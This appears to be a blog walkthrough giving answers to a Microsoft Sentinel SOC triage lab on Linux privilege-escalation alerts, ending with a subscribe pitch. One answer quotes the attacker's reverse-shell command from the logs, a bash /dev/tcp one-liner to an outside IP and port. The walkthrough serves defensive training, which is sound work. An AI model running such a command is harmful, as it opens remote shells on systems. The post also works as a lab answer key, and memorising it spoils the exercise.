Task 4 : Investigation Proper

Answer the questions below

How many entities are affected by the Linux PrivEsc - Polkit Exploit Attempt alert?

10

What is the severity of the Linux PrivEsc - Sudo Shadow Access alert?

High

How many accounts were added to the sudoers group in the Linux PrivEsc - User Added to Sudo Group alert?

4

Task 5 : Diving Deeper Into Logs

Answer the questions below

What is the name of the kernel module installed in websrv-01?

malicious_mod.ko

What is the unusual command executed within websrv-01 by the ops user?

/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1

What is the source IP address of the first successful SSH login to storage-01?

172.16.0.12

What is the external source IP that successfully logged in as root to app-01?

203.0.113.45

Aside from the backup user, what is the name of the user added to the sudoers group inside app-01? deploy

Loved breaking down Microsoft Sentinel and mastering SOC alert triaging in this Azure Sentinel challenge? You’re not alone — this room is a favorite for anyone serious about real-world blue team skills! 🔍💥

If you want more in-depth walkthroughs like this, from SIEM investigations to cloud security CTFs and hands-on cyber labs, make sure you subscribe to the blog! I publish fresh, practical guides, expert tips, and exclusive insights regularly, so you’ll always stay ahead in your cybersecurity journey.

Don’t miss out — join our growing community of learners and level up your security skills one room at a time! 🚀